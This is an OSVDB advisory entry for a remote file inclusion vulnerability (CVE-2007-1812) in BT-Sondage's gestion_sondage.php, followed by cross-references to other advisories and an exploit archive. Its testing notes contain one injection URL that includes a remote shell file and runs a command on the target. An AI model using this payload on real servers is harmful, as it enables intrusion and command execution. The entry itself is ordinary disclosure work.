BT-Sondage utilitaires/gestion_sondage.php repertoire_visiteur Variable Remote File Inclusion

2007-04-01T05:04:14
ID OSVDB:34597
Type osvdb
Reporter OSVDB
Modified 2007-04-01T05:04:14

Description

Manual Testing Notes

http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls

References:

Secunia Advisory ID:24701 Mail List Post: http://www.attrition.org/pipermail/vim/2007-April/001483.html ISS X-Force ID: 33363 Generic Exploit URL: http://www.milw0rm.com/exploits/3624 FrSIRT Advisory: ADV-2007-1183 CVE-2007-1812 Bugtraq ID: 23248